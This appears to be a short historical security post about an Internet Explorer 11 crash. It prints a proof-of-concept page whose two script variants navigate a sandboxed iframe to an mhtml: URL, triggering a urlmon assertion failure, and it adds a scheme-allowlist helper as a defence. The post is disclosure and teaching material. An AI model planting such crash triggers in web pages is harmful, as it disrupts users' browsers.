A brief crash report. Setting an iFrame’s location to a mhtml: URL — including a bare mhtml: with no path — triggered an assertion failure in urlmon!CBSCHolder::RemoveNode, the same root cause as the top-level MHTML navigation crash.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>IE11_DoS_Load_mhtml_in_iFrame</title>
</head>
<body>
<iframe sandbox width="50" height="20"></iframe>
<script>
// Variant 1: navigate the sandboxed iframe to an mhtml: URL that wraps the current page URL.
function crash1()
{
window[0].location = "mhtml:" + location.href;
}
// Variant 2: a bare mhtml: with no path, assigned twice so the second navigation
// starts while the first bind is still being torn down.
function crash2()
{
window[0].location = "mhtml:";
setTimeout('window[0].location = "mhtml:";', 500);
}
</script>
</body>
</html>
Both variants hit the same urlmon!CBSCHolder::RemoveNode assertion at mpxbsc.cxx(1685) with unknown exploitability. The mhtml: protocol handler consistently left a bind status callback in a state where it could not be revoked during navigation teardown, whether triggered from the top-level frame or an iFrame.
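The browser-side bug above was fixed in urlmon, but the page-side lesson still applies: script that navigates a child frame to a caller-supplied URL should allowlist the scheme instead of passing arbitrary strings through. The following is an added example, not code from the original post; `isAllowedFrameUrl`, `navigateFrame` and the `ALLOWED_SCHEMES` set are assumptions for this illustration, and the `frame` argument is any object with a `location` property (in a page, `window[0]` or `iframe.contentWindow`).

```javascript
// Added example (not from the original post). Only http: and https: frames are
// allowed; the set is an assumption for this illustration.
const ALLOWED_SCHEMES = new Set(["http:", "https:"]);

// Returns true only if `raw` (resolved against `base` when given) parses to an
// allowed scheme. "mhtml:" and "mhtml:http://example.com/" both parse with
// protocol "mhtml:" and are rejected, as are javascript:, data:, file: and any
// other scheme not on the allowlist.
function isAllowedFrameUrl(raw, base) {
  let parsed;
  try {
    parsed = base === undefined ? new URL(raw) : new URL(raw, base);
  } catch (e) {
    return false; // unparseable input is rejected rather than handed to the browser
  }
  return ALLOWED_SCHEMES.has(parsed.protocol);
}

// Navigates `frame` only when the URL passes the scheme check. Returns true on
// navigation and false when the request was refused; `frame.location` is left
// untouched in the refused case.
function navigateFrame(frame, raw, base) {
  if (!isAllowedFrameUrl(raw, base)) {
    return false;
  }
  const resolved = base === undefined ? new URL(raw) : new URL(raw, base);
  frame.location = resolved.href; // assigning a string navigates a real window
  return true;
}

// Constructed stand-in for window[0] so the helper can be exercised outside a browser.
const demoFrame = { location: "about:blank" };
navigateFrame(demoFrame, "mhtml:");               // refused, location unchanged
navigateFrame(demoFrame, "https://example.com/"); // allowed
```

The check runs on the parsed `protocol`, so case variations such as `MHTML:` and leading whitespace are normalised by the URL parser before the comparison. It does not protect a page from an attacker who can already run script in it; it protects the host page from forwarding a third-party-controlled string into a frame navigation.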
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.